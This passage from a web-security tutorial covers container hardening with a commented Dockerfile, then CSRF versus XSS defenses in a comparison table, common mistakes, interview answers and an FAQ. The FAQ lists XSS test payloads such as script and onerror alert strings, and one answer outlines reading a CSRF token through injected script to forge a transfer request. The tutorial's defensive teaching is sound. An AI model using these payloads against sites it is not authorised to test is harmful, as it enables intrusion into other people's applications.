Centralized enforcement in a filter is the only way to guarantee 100% header coverage. One forgotten endpoint — a 404 handler, an error page, a health check — is all an attacker needs to find an unprotected surface. Filters run on every response. Put security there.

Containerized Security: Deploying Hardened Runtimes

Application-level security — CSRF tokens, output encoding, CSP headers — protects against attacks that reach your application code. Container security protects against what happens when those defenses fail, or when an attacker finds a way in through a dependency vulnerability, a deserialization bug, or an unpatched library.

The principle is blast radius reduction. If an attacker achieves Remote Code Execution (RCE) in your application, what can they do from there? Running as root inside a container means they can read every environment variable, write to the filesystem, install packages, and potentially escape the container if the container runtime has vulnerabilities. Running as a non-root user means they're constrained to what that user can do — which in a minimal Alpine-based image with no package manager and read-only mounts is very little.

The Dockerfile below implements the standard hardened production baseline. It's not exotic — no SELinux profiles, no seccomp filters, no AppArmor policies — just the handful of Dockerfile directives that eliminate the most common container security failures. These are worth doing in every service, not just the ones you're worried about.

Dockerfile · DOCKERFILE
123456789101112131415161718192021222324252627282930313233343536373839404142
# io.thecodeforge: Hardened Production Container
# Base: node:20-alpine — minimal attack surface, no package manager in final image
# Pattern: two-stage approach ensures build tools never ship to production

# ---- Stage 1: dependency installation ----
FROM node:20-alpine AS deps

WORKDIR /build

# Copy lock file first — Docker layer cache avoids re-running npm ci
# unless package-lock.json actually changes
COPY package*.json ./

# npm ci: clean install from lock file — deterministic, no version drift
# --only=production: excludes devDependencies (test runners, build tools)
#   from the final image
RUN npm ci --only=production

# ---- Stage 2: production runtime ----
FROM node:20-alpine

# Run as non-privileged user — node user exists in the official image
# If an attacker achieves RCE, they operate as 'node' with minimal permissions
# They cannot install packages, write to system paths, or modify other users' files
USER node
WORKDIR /home/node/app

# Copy only production node_modules from the deps stage
# Build tools (npm, yarn, compilers) are not present in the final image
COPY --from=deps --chown=node:node /build/node_modules ./node_modules

# Copy application source
COPY --chown=node:node . .

# Expose only the port the application actually uses
# This does not publish the port — that's done at docker run or in compose
EXPOSE 3000

# Use exec form (array syntax) not shell form ('node server.js')
# Exec form means node is PID 1 and receives SIGTERM directly
# Shell form wraps in /bin/sh -c, which swallows signals and complicates graceful shutdown
CMD ["node", "server.js"]
▶ Output
Successfully built image thecodeforge/hardened-app:latest
⚠ Running as Root in Containers: The Default That Shouldn't Be
The default Docker user is root. This is not a temporary development convenience — it's the production default for any image that doesn't explicitly set USER. If an attacker exploits an RCE vulnerability in your Node.js application, your Express framework, or any of your npm dependencies (and supply chain attacks against npm packages are a documented, recurring threat), they get root access inside the container. From root, privilege escalation paths to the host are not theoretical — they're documented CVEs against container runtimes. Setting USER node is a single line that eliminates the entire class of 'attacker got RCE and now has root' scenarios.
📊 Production Insight
The multi-stage Dockerfile pattern matters beyond just image size. Build tools — compilers, dev dependencies, npm itself in some configurations — represent a significant attack surface if they're present in the production image. An attacker with RCE who finds npm installed can run npm install <malicious-package> to extend their capabilities. An attacker who finds no package manager and a read-only filesystem is constrained to the application's existing capabilities.
Alpine-based images reduce the installed binary surface by roughly 90% compared to a full Debian or Ubuntu base image. There's no curl, no wget, no bash (only sh), no compiler toolchain. That's not just a size optimization — it's removal of the tools that make post-exploitation pivoting significantly easier. The trade-off is occasional compatibility friction with packages that have native bindings requiring glibc instead of musl libc. Verify your dependency tree against Alpine compatibility before committing to it in a production service.
🎯 Key Takeaway
Container security is defense-in-depth for the application security layer — your app can have an exploitable vulnerability, but the blast radius is contained by what the process is permitted to do. Non-root USER is the single most impactful Dockerfile security change. Alpine images reduce the post-exploitation toolkit available to an attacker. Multi-stage builds keep build tools out of the production runtime.
🗂 CSRF vs XSS
Two attack vectors, two trust models, two defense strategies — understanding which trust relationship each attack exploits determines which defenses actually work
AspectCSRF (Cross-Site Request Forgery)XSS (Cross-Site Scripting)
What trust relationship the attacker abusesThe server's trust in the user's browser — the server sees a valid session cookie and assumes the user authorized the requestThe user's trust in the website's content — the user's browser sees content delivered from your domain and treats it as legitimate
Where the attack originatesA separate malicious website that the victim visits while logged into the target siteCode injected into the target website itself — the malicious content is served from your own domain
What the attacker can doTrigger authenticated actions on behalf of the victim — transfers, setting changes, data modifications — anything the victim's session is authorized to doExecute arbitrary JavaScript in the victim's browser with full access to the DOM, cookies (non-HttpOnly), localStorage, and the ability to make authenticated requests
Can the attacker read response data?No — same-origin policy blocks the attacker from reading the response. CSRF can only trigger actions, not exfiltrate data directly.Yes — attacker code runs on your origin, so it has full access to everything on the page, including DOM content, form values, and non-HttpOnly cookies
Can one vulnerability bypass the other's defense?Yes — XSS can read CSRF tokens from the DOM, completely bypassing CSRF token protection since the token is visible to same-origin JavaScriptPartially — CSRF does not bypass XSS, but stored XSS can be used to perform CSRF actions from within the victim's browser once the XSS executes
Primary defenseSynchronizer CSRF tokens embedded in forms, validated server-side on every state-changing requestOutput encoding at render time in the correct context (HTML, JS, URL, CSS) — treat user input as data, never as markup
Secondary defenseSameSite=Strict cookie attribute (browser-enforced) + Origin/Referer header validation as a belt-and-suspenders checkContent Security Policy header — browser-enforced execution restrictions that block injected scripts even if encoding is bypassed
Relative severityHigh — can perform any authenticated action the victim's session is authorized forCritical — can read data, bypass CSRF, steal session tokens, and persist in stored form to affect all future visitors

🎯 Key Takeaways

  • CSRF exploits the browser's automatic cookie attachment — CSRF tokens are the primary server-side mechanism for verifying that the user actually intended the request, not just that they have a valid session
  • XSS is categorically more dangerous than CSRF because it can read the DOM, exfiltrate tokens, bypass CSRF protection, and in its stored form affects every future visitor without requiring any interaction
  • Output encoding stops XSS injection at the HTML parsing level; CSP stops execution at the browser enforcement level — you need both, because encoding is fallible and CSP catches what slips through
  • HttpOnly, Secure, and SameSite=Strict cookie attributes eliminate entire classes of attacks with minimal implementation cost — treat these as non-negotiable defaults, not optional hardening
  • Never store JWT tokens or CSRF tokens in localStorage — HttpOnly cookies prevent JavaScript access and close the XSS exfiltration path that localStorage leaves wide open
  • Your back-end validation must never trust the client implicitly — assume your front-end is compromised, because if a dependency has an XSS vulnerability, it effectively is

⚠ Common Mistakes to Avoid

    Relying on SameSite=Lax as the sole CSRF defense
    Symptom

    CSRF attacks succeed via top-level GET navigation. An attacker links to your site from an external page with query parameters that trigger a state change — and because it's a top-level navigation, Lax allows the cookie. Or a confused-deputy attack chains a GET that leaks state into a subsequent forged POST.

    Fix

    Use SameSite=Strict for authentication cookies on high-security applications — it provides stronger protection by blocking the cookie on all cross-site requests without exception. Always implement CSRF tokens as the primary, server-enforced defense independent of browser-side cookie policy. SameSite is a defense-in-depth layer, not a replacement for tokens.

    HTML-encoding user input at storage time instead of at render time
    Symptom

    Double-encoded output appears in the UI — users see &amp;lt;script&amp;gt; instead of <script> and &amp; instead of &. The stored data is permanently mangled and causes secondary failures when the same data is used in non-HTML contexts: API responses return HTML entities in JSON strings, CSV exports have garbled cell values, email templates render encoded characters as literals.

    Fix

    Store user input raw in the database, exactly as the user provided it. Apply the appropriate output encoding at render time, in the correct context for each output destination. HTML-encode for HTML templates. JSON-encode for JSON responses. URL-encode for query parameters. CSS-encode for CSS values. The encoding function changes depending on where the data is going — storage is never the right encoding context.

    Deploying a CSP header that includes 'unsafe-inline' in script-src
    Symptom

    Security scanner reports 'CSP present' in its header audit, giving a false sense of protection. But unsafe-inline means any inline script — including injected XSS payloads — executes without restriction. The CSP header is providing compliance coverage without providing security.

    Fix

    Remove unsafe-inline from script-src. Move all inline JavaScript to external .js files served from your own origin. For JavaScript that must remain inline — framework initialization code, server-rendered state hydration — use CSP nonces: generate a cryptographically random value per request, include it in the CSP header (script-src 'self' 'nonce-{value}'), and add the matching nonce attribute to each allowed script tag. Injected scripts without the correct nonce are blocked even if unsafe-inline was tempting to add back.

    Not rotating session IDs after authentication (session fixation vulnerability)
    Symptom

    An attacker sets a known session ID on the victim's browser — via a crafted link parameter or a cross-subdomain cookie injection — before the victim logs in. The victim authenticates with that known session ID. The attacker, who already knows the session ID, now has an authenticated session without ever knowing the victim's credentials.

    Fix

    Regenerate the session ID on every privilege-level change: after login, after logout, after password change, after role elevation. In Express: call req.session.regenerate() explicitly inside your login handler — it is not called automatically. In Django: login() calls cycle_key() internally, so the default behavior is correct as long as you use the built-in login() function. Never implement your own session management without testing for session fixation.

    Using innerHTML or dangerouslySetInnerHTML with user-supplied content without sanitization
    Symptom

    Rich text content, markdown output, or user-formatted display names render correctly in testing (where test content is benign) but become XSS vectors in production when real users submit payloads. The XSS may be DOM-based, making it invisible to server-side log analysis and WAF detection.

    Fix

    Never assign user-supplied content to innerHTML without first running it through DOMPurify.sanitize(). DOMPurify parses the content in a sandboxed context, strips all JavaScript event handlers and dangerous tags, and returns safe HTML. For content that should never contain HTML formatting — usernames, product names, search terms — use element.textContent instead of innerHTML. textContent treats the entire string as literal text, making XSS structurally impossible regardless of what the string contains.

Interview Questions on This Topic

  • QYou have CSRF token protection on your transfer endpoint. A security researcher claims your app is still vulnerable to CSRF via XSS. How does that work?SeniorReveal
    The researcher is describing a real and important attack chain. CSRF token protection relies on the same-origin policy: the attacker on evil.com can't read your bank.com page, so they can't retrieve the CSRF token embedded there. That guarantee holds only as long as the attacker cannot execute code on your origin. If an XSS vulnerability exists anywhere on bank.com — in a profile field, a comment section, a search result, anywhere — the attacker can inject JavaScript that runs on your origin. From that position, the injected code can do document.querySelector('input[name=_csrf]').value to read the CSRF token directly from the DOM. It can then make a fetch() call to the transfer endpoint with the valid token and the user's session cookie attached automatically. The server sees a valid session, a valid CSRF token, and processes the request. This is why XSS is considered the more critical vulnerability: it can render CSRF protection completely ineffective, steal session tokens from cookies that aren't HttpOnly, read sensitive page content, and persist in stored form to affect every subsequent visitor. The lesson is that XSS and CSRF defenses are not independent — XSS is a CSRF bypass vector, so fixing XSS is also part of CSRF defense.
  • QExplain the 'Double Submit Cookie' pattern. Why is it useful for stateless APIs that don't maintain a server-side session?Mid-levelReveal
    Double Submit Cookie is a CSRF defense designed for scenarios where the server has no session state to store a CSRF token against — common in REST APIs using JWT authentication or in horizontally scaled services where sticky sessions aren't available. The pattern works like this: when the client loads the application, the server sets a random token in a cookie (not HttpOnly — it needs to be JavaScript-readable). The client reads that cookie value and includes it in every state-changing request as a custom header — X-CSRF-Token is the conventional name. The server compares the cookie value against the header value. If they match, the request is legitimate. The security guarantee comes from the same-origin policy: an attacker on evil.com cannot read the cookie value from bank.com's domain. They can trigger a request that sends the cookie to bank.com — the browser attaches it automatically — but they cannot set the X-CSRF-Token header to match a value they can't read. The server sees a mismatched pair and rejects the request. The critical limitation: this pattern fails entirely if XSS is present. An XSS payload running on your domain can read the non-HttpOnly cookie with document.cookie, extract the token value, and set the matching header in a forged fetch() request. Double Submit Cookie's security guarantee depends on the attacker being unable to read the cookie value — XSS removes that dependency. For most stateless API scenarios, I'd recommend pairing Double Submit with SameSite=Strict cookies and ensuring XSS prevention is solid before relying on this pattern.
  • QYour single-page application uses JWT tokens stored in localStorage for authentication. Does CSRF still apply? What new risk have you introduced?Mid-levelReveal
    CSRF does not apply to JWT-in-localStorage. The reason is specific: browsers do not automatically attach localStorage values to outbound requests. The cookie auto-attachment behavior that makes CSRF possible simply doesn't exist for localStorage. Your JavaScript code must explicitly read the JWT and add it to the Authorization header on each request. An attacker on evil.com can trigger a request to your API, but that request won't carry the JWT — the browser won't add it, and evil.com's JavaScript can't read localStorage across origins. However, you've traded one attack vector for another, and the trade is not favorable. Any JavaScript executing on your domain — including injected XSS payloads — can call localStorage.getItem('jwt') and read the token in plain text. The attacker can then exfiltrate the JWT to their own server and use it to make authenticated API requests directly, from anywhere, without needing to operate within the victim's browser session. With cookies and HttpOnly, the attacker needs to maintain presence in the victim's browser to exploit the session. With localStorage and JWT, they can extract the token once and use it indefinitely (until expiration) from their own infrastructure. HttpOnly cookies prevent this specific attack because document.cookie cannot read HttpOnly cookies. The practical recommendation for most applications: store JWTs in HttpOnly cookies (accepting that you need CSRF tokens as a result), rather than localStorage. The XSS risk from localStorage token exfiltration is harder to fully mitigate than CSRF.
  • QDescribe the difference between Reflected, Stored, and DOM-based XSS. Which would you prioritize fixing in a forum application?Mid-levelReveal
    Reflected XSS: the payload is embedded in a URL parameter — typically a search term, an error message parameter, or a redirect destination. The server reads the parameter and reflects it in the response without encoding. Only affects users who load that specific crafted URL. Requires social engineering to deliver: the attacker must send the victim a link. Stored XSS: the payload is submitted through a form and persisted to the database — a forum post, a comment, a display name, a profile bio. It's then served to every user who views that content, without requiring any interaction from the victim. A single stored payload in a popular thread can execute for thousands of users over days or weeks before discovery. DOM-based XSS: the injection happens entirely in the client's browser. The malicious string is never sent to the server — it's read from the URL hash, query parameters, postMessage events, or other browser APIs by your own JavaScript, which then writes it unsafely to innerHTML or passes it to eval(). This variant is invisible to server-side WAFs, log analysis, and most SAST tools unless they support JavaScript analysis. In a forum application, I'd prioritize Stored XSS first, without hesitation. The reach and persistence make it categorically more dangerous: one successful injection affects every visitor to that thread automatically, indefinitely, until it's discovered and the payload is removed from the database. Reflected XSS requires per-victim delivery. DOM-based XSS also requires delivery of a crafted URL. Stored XSS operates autonomously once planted.
  • QHow does the 'nonce' attribute in a Content Security Policy help you safely execute specific inline scripts while blocking all injected ones?SeniorReveal
    A CSP nonce is a cryptographically random string — typically 128+ bits of entropy encoded as base64 — generated fresh by the server for each HTTP request. The server includes it in two places simultaneously: the CSP response header as 'nonce-{value}' in the script-src directive, and as a nonce attribute on each inline script tag that should be permitted to execute. The browser, on receiving the response, checks every inline script tag it encounters. If the script's nonce attribute matches the value in the CSP header, the browser executes it. If the nonce is absent or wrong, the browser blocks execution and (if report-uri is configured) sends a CSP violation report. The security guarantee comes from the unpredictability of the nonce. It's generated per-request and never exposed in the page in a way that a XSS payload can read before it would need to use it. An attacker who injects a script tag cannot know the current request's nonce value — it changes with every page load — so their injected script lacks the correct nonce attribute and is blocked. This allows you to maintain necessary inline scripts — server-side state hydration for React or Vue, initialization code that references server-rendered configuration — without resorting to 'unsafe-inline', which would allow all inline scripts including injected ones. The implementation requirement: nonces must be generated server-side, per request, and injected into both the response header and the HTML template. This means you need server-side rendering or a server-side template layer — you can't generate effective nonces in a purely static HTML file.

Frequently Asked Questions

Can HTTPS alone protect against CSRF and XSS attacks?

No — and this is a common mental model mistake worth correcting precisely. HTTPS encrypts the connection between the browser and the server, preventing network-level eavesdropping and man-in-the-middle interception of credentials and session tokens. It is essential infrastructure, but it operates at the transport layer.

CSRF and XSS are application-layer attacks. CSRF abuses the session that already exists after a legitimate HTTPS login — the session cookie is valid, the request arrives over HTTPS, and the server has no way to distinguish a legitimate user action from a forged cross-site request without a CSRF token. XSS injects malicious code into the application's own responses — those responses are delivered faithfully over HTTPS, encryption intact, payload included.

HTTPS is a prerequisite, not a substitute. You need it, and you also need CSRF tokens, output encoding, and CSP headers.

If I'm building a REST API that uses JWT in Authorization headers instead of cookies, do I need CSRF protection?

If you are strictly using the Authorization header and storing the JWT in memory (never in cookies or localStorage), CSRF does not apply. The browser will not automatically attach the Authorization header to cross-site requests the way it attaches cookies — your JavaScript code must add it explicitly, and cross-site JavaScript cannot do that.

However, the word 'strictly' is doing a lot of work in that sentence. If any part of your authentication mechanism sets a cookie — even for CSRF token purposes, even for session tracking on a separate login page — you may reintroduce the attack surface. And storing the JWT in localStorage exposes it to XSS exfiltration, which is a different but comparably serious risk.

The practical answer for most REST APIs: if you're using Authorization headers with in-memory token storage, CSRF is not your concern, but XSS prevention becomes more critical because token theft via XSS is the primary authentication attack vector in that architecture.

What's the easiest way to test if my app is vulnerable to XSS right now?

Manual testing is the fastest starting point: submit the string <script>alert(document.domain)</script> into every input field in your application — search boxes, form fields, URL parameters, profile fields, comment boxes. If an alert box appears showing your domain name, you have a reflected or stored XSS vulnerability at that injection point. The document.domain payload confirms you're executing on your origin, not just getting a JavaScript syntax error.

Also test event handler injection for cases where your application filters script tags: try <img src=x onerror=alert(1)>, <svg onload=alert(1)>, and <a href="javascript:alert(1)">click</a>. Many filters block script tags but miss event handler injection.

For a more thorough automated scan, OWASP ZAP (free) and Burp Suite (professional tier) both include XSS scanners that crawl your application and test input fields systematically. These catch cases that manual testing misses, particularly in complex multi-step flows. Run them in a staging environment — aggressive scanning against production can create stored XSS test payloads that reach real users.

What is a 'Nonce' in the context of CSP?

A nonce — short for 'number used once,' though in practice it's a random string used once per request rather than a sequential number — is a cryptographically random value that your server generates fresh for each HTTP response.

You include the nonce in two places simultaneously: the CSP header (script-src 'self' 'nonce-abc123xyz') and the nonce attribute of every inline script tag you want to allow (<script nonce="abc123xyz">...</script>). The browser only executes inline scripts whose nonce attribute matches the value in the CSP header.

Because the nonce changes with every request and attackers cannot predict or retrieve it before their injection executes, injected script tags — which won't have the correct nonce — are blocked by the browser. This lets you maintain necessary inline scripts (server-rendered initialization code, state hydration) while blocking arbitrary injection, without falling back to 'unsafe-inline' which would permit everything.

Should I store CSRF tokens in cookies or server-side sessions?

Server-side sessions are the stronger choice for most applications. When the CSRF token is stored in the session (server-side), it never travels in a cookie that JavaScript can read. The session cookie itself can be HttpOnly, making the token completely inaccessible to any JavaScript — including XSS payloads. The server compares the submitted token against the session-stored value, and the token is only ever visible in the HTML of the page it's embedded in.

Cookie-based CSRF tokens (the Double Submit pattern) are pragmatic for stateless services or APIs that can't maintain server-side session state. They work because an attacker can't read cookies across origins. But they share the XSS vulnerability: if an attacker achieves XSS on your domain, they can read the non-HttpOnly CSRF cookie with document.cookie and forge both sides of the comparison.

The rule I apply: use session-stored CSRF tokens with HttpOnly, Secure, SameSite=Strict session cookies as the default. Use Double Submit only when statelessness is a genuine architectural requirement, and ensure XSS prevention is especially solid in that case since it's the main attack vector against that pattern.

🔥
Naren Founder & Author

Developer and founder of TheCodeForge. I built this site because I was tired of tutorials that explain what to type without explaining why it works. Every article here is written to make concepts actually click.

← PreviousAPI Security Best PracticesNext →Encryption at Rest and in Transit
Forged with 🔥 at TheCodeForge.io — Where Developers Are Forged